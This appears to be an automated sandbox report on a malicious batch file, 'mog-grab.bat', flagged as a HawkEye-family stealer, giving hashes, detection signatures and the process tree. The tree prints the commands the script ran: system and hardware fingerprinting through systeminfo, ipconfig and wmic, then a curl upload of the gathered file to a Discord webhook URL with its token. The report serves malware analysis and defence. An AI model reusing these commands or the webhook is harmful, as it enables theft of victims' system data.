Overview

overview

10

Static

static

1

mog-grab.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    94s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04-11-2024 18:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mog-grab.bat

  • Size

    1KB

  • MD5

    56d860629dd34b3e1ee315836d1ea2c8

  • SHA1

    228c847b5ff10c72e81f4e3f40f55ea4bd9f462d

  • SHA256

    ac263079dd4322dfbeff397cec03ffaa361815fb3b8795773c1a299650e4a9ca

  • SHA512

    dbbda5b65c0cf86d922e4a16c05f974e807328695b3f2b18a9fb216f3dcd0b55807f203c149a81918c2d8857fcbb4dccc3d7b3bf7717fb43eb09105ed37a9b47

Score
10/10
hawkeyekeyloggerspywarestealertrojan

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

    keyloggertrojanstealerspywarehawkeye
  • Hawkeye family
    hawkeye
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mog-grab.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:4756
    • C:\Windows\system32\ipconfig.exe
      ipconfig /all
      2⤵
      • Gathers network information
      PID:432
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ipconfig | findstr "IPv4 Address"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Windows\system32\ipconfig.exe
        ipconfig
        3⤵
        • Gathers network information
        PID:2084
      • C:\Windows\system32\findstr.exe
        findstr "IPv4 Address"
        3⤵
          PID:648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ipconfig | findstr "IPv6 Address"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:880
        • C:\Windows\system32\ipconfig.exe
          ipconfig
          3⤵
          • Gathers network information
          PID:1880
        • C:\Windows\system32\findstr.exe
          findstr "IPv6 Address"
          3⤵
            PID:2852
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic cpu get name,description /value
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:244
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic bios get name,version,serialnumber /value
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:248
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic path win32_videocontroller get name,adapterram /value
          2⤵
          • Detects videocard installed
          PID:2732
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic baseboard get product,manufacturer,serialnumber,version /value
          2⤵
            PID:1176
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic diskdrive get model,size /value
            2⤵
              PID:2360
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic memorychip get capacity,manufacturer,partnumber,speed /value
              2⤵
                PID:2516
              • C:\Windows\system32\curl.exe
                curl --ssl-no-revoke -F "[email protected]" https://discord.com/api/webhooks/1303034513256874039/rvIOtKCnMFcNztPrNc2yMIpVKRZ1NJ7FMhgrYGvtpQSV65OhpnAl3yBDnhCpbvoFxOXB
                2⤵
                  PID:2880

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
                Filesize

                3KB

                MD5

                8af13ed45fcc0004223f6e8b3e51fbe5

                SHA1

                94e389f4cfeef81935287007a3bd420e83b839d9

                SHA256

                b28f71cf00c13945fd5f5bea049a26b37064c02b97a5d19dd7e3e4f6103cb1ff

                SHA512

                843faf115700a1093559d2dfeff17cb7034a2e53634e16057d9d2bc3921f991fecee4285a5ece31d4171fc1b9edafdcca904a53257177b0a842ab2713eb3f52e

                Download Submit